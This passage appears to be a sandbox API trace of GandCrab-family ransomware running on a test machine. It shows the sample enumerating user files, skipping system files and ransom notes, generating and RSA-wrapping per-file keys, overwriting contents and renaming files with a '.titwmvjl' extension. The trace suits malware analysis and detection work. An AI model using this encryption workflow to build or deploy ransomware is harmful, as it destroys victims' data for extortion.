8\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.099] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0069.099] CloseHandle (hObject=0x2ac) returned 1 [0069.100] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.100] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.100] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xe, wMilliseconds=0x19e)) [0069.100] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.100] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.101] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.101] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\d2ca4a09d2ca4deb61a.lock") returned 62 [0069.101] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0069.101] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.102] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.102] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\") returned 38 [0069.102] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\*" [0069.102] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0x503778 [0069.102] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.102] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0069.102] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.102] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.103] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0069.103] lstrcmpW (lpString1="-f0 chr8O.ppt", lpString2=".") returned 1 [0069.103] lstrcmpW (lpString1="-f0 chr8O.ppt", lpString2="..") returned 1 [0069.103] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="-f0 chr8O.ppt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\-f0 chr8O.ppt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\-f0 chr8O.ppt" [0069.103] lstrlenW (lpString=".titwmvjl") returned 9 [0069.103] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\-f0 chr8O.ppt") returned 51 [0069.103] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.103] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\-f0 chr8O.ppt.titwmvjl") returned 60 [0069.103] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\-f0 chr8O.ppt") returned 51 [0069.103] lstrlenW (lpString=".ppt") returned 4 [0069.103] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.103] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".ppt ") returned 5 [0069.103] lstrcmpiW (lpString1=".ppt", lpString2=".titwmvjl") returned -1 [0069.103] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.103] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\-f0 chr8O.ppt") returned 51 [0069.103] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\-f0 chr8O.ppt") returned 51 [0069.103] lstrcmpiW (lpString1="-f0 chr8O.ppt", lpString2="desktop.ini") returned 1 [0069.103] lstrcmpiW (lpString1="-f0 chr8O.ppt", lpString2="autorun.inf") returned 1 [0069.103] lstrcmpiW (lpString1="-f0 chr8O.ppt", lpString2="ntuser.dat") returned -1 [0069.103] lstrcmpiW (lpString1="-f0 chr8O.ppt", lpString2="iconcache.db") returned -1 [0069.103] lstrcmpiW (lpString1="-f0 chr8O.ppt", lpString2="bootsect.bak") returned 1 [0069.103] lstrcmpiW (lpString1="-f0 chr8O.ppt", lpString2="boot.ini") returned 1 [0069.103] lstrcmpiW (lpString1="-f0 chr8O.ppt", lpString2="ntuser.dat.log") returned -1 [0069.103] lstrcmpiW (lpString1="-f0 chr8O.ppt", lpString2="thumbs.db") returned -1 [0069.104] lstrcmpiW (lpString1="-f0 chr8O.ppt", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0069.104] lstrcmpiW (lpString1="-f0 chr8O.ppt", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0069.104] lstrcmpiW (lpString1="-f0 chr8O.ppt", lpString2="KRAB-DECRYPT.html") returned -1 [0069.104] lstrcmpiW (lpString1="-f0 chr8O.ppt", lpString2="CRAB-DECRYPT.html") returned 1 [0069.104] lstrcmpiW (lpString1="-f0 chr8O.ppt", lpString2="KRAB-DECRYPT.txt") returned -1 [0069.104] lstrcmpiW (lpString1="-f0 chr8O.ppt", lpString2="CRAB-DECRYPT.txt") returned 1 [0069.104] lstrcmpiW (lpString1="-f0 chr8O.ppt", lpString2="ntldr") returned -1 [0069.104] lstrcmpiW (lpString1="-f0 chr8O.ppt", lpString2="NTDETECT.COM") returned -1 [0069.104] lstrcmpiW (lpString1="-f0 chr8O.ppt", lpString2="Bootfont.bin") returned 1 [0069.104] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\-f0 chr8O.ppt") returned 51 [0069.104] lstrlenW (lpString=".ppt") returned 4 [0069.104] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.104] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".ppt ") returned 5 [0069.104] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.104] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.104] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\-f0 chr8O.ppt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\-f0 chr8o.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0069.104] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.105] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0069.105] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.105] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.105] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0069.106] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.106] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.106] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.106] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0069.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.106] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.106] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.107] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0069.107] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.107] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.107] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.107] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0069.107] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.107] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.107] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.108] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.108] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0069.109] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.109] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5036f8) returned 1 [0069.109] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.109] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0069.109] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.109] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0069.109] GetLastError () returned 0x0 [0069.109] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.110] CryptDestroyKey (hKey=0x5036f8) returned 1 [0069.110] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.110] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.110] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.110] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0069.110] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.110] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5031f8) returned 1 [0069.110] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.111] CryptGetKeyParam (in: hKey=0x5031f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0069.111] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.111] CryptEncrypt (in: hKey=0x5031f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0069.111] GetLastError () returned 0x0 [0069.111] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.111] CryptDestroyKey (hKey=0x5031f8) returned 1 [0069.111] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.111] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.111] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0069.111] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0069.112] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0x15941, lpOverlapped=0x0) returned 1 [0069.118] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffea6bf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.118] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x15941, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0x15941, lpOverlapped=0x0) returned 1 [0069.120] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0069.121] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.124] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.125] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.125] CloseHandle (hObject=0x2b4) returned 1 [0069.127] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\-f0 chr8O.ppt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\-f0 chr8o.ppt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\-f0 chr8O.ppt.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\-f0 chr8o.ppt.titwmvjl"), dwFlags=0x1) returned 1 [0069.128] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.128] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0069.128] lstrcmpW (lpString1="021Ad.ods", lpString2=".") returned 1 [0069.128] lstrcmpW (lpString1="021Ad.ods", lpString2="..") returned 1 [0069.128] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="021Ad.ods" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\021Ad.ods") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\021Ad.ods" [0069.128] lstrlenW (lpString=".titwmvjl") returned 9 [0069.128] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\021Ad.ods") returned 47 [0069.128] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.129] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\021Ad.ods.titwmvjl") returned 56 [0069.129] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\021Ad.ods") returned 47 [0069.129] lstrlenW (lpString=".ods") returned 4 [0069.129] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.129] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".ods ") returned 5 [0069.129] lstrcmpiW (lpString1=".ods", lpString2=".titwmvjl") returned -1 [0069.129] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.129] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\021Ad.ods") returned 47 [0069.129] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\021Ad.ods") returned 47 [0069.129] lstrcmpiW (lpString1="021Ad.ods", lpString2="desktop.ini") returned -1 [0069.129] lstrcmpiW (lpString1="021Ad.ods", lpString2="autorun.inf") returned -1 [0069.129] lstrcmpiW (lpString1="021Ad.ods", lpString2="ntuser.dat") returned -1 [0069.129] lstrcmpiW (lpString1="021Ad.ods", lpString2="iconcache.db") returned -1 [0069.129] lstrcmpiW (lpString1="021Ad.ods", lpString2="bootsect.bak") returned -1 [0069.129] lstrcmpiW (lpString1="021Ad.ods", lpString2="boot.ini") returned -1 [0069.129] lstrcmpiW (lpString1="021Ad.ods", lpString2="ntuser.dat.log") returned -1 [0069.129] lstrcmpiW (lpString1="021Ad.ods", lpString2="thumbs.db") returned -1 [0069.129] lstrcmpiW (lpString1="021Ad.ods", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0069.129] lstrcmpiW (lpString1="021Ad.ods", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0069.129] lstrcmpiW (lpString1="021Ad.ods", lpString2="KRAB-DECRYPT.html") returned -1 [0069.129] lstrcmpiW (lpString1="021Ad.ods", lpString2="CRAB-DECRYPT.html") returned -1 [0069.129] lstrcmpiW (lpString1="021Ad.ods", lpString2="KRAB-DECRYPT.txt") returned -1 [0069.130] lstrcmpiW (lpString1="021Ad.ods", lpString2="CRAB-DECRYPT.txt") returned -1 [0069.130] lstrcmpiW (lpString1="021Ad.ods", lpString2="ntldr") returned -1 [0069.130] lstrcmpiW (lpString1="021Ad.ods", lpString2="NTDETECT.COM") returned -1 [0069.130] lstrcmpiW (lpString1="021Ad.ods", lpString2="Bootfont.bin") returned -1 [0069.130] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\021Ad.ods") returned 47 [0069.130] lstrlenW (lpString=".ods") returned 4 [0069.130] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.130] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".ods ") returned 5 [0069.130] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.130] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.130] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\021Ad.ods" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\021ad.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0069.130] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.131] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0069.131] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.131] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.131] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0069.132] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.132] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.132] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.132] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0069.132] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.132] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.132] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.133] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.133] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, 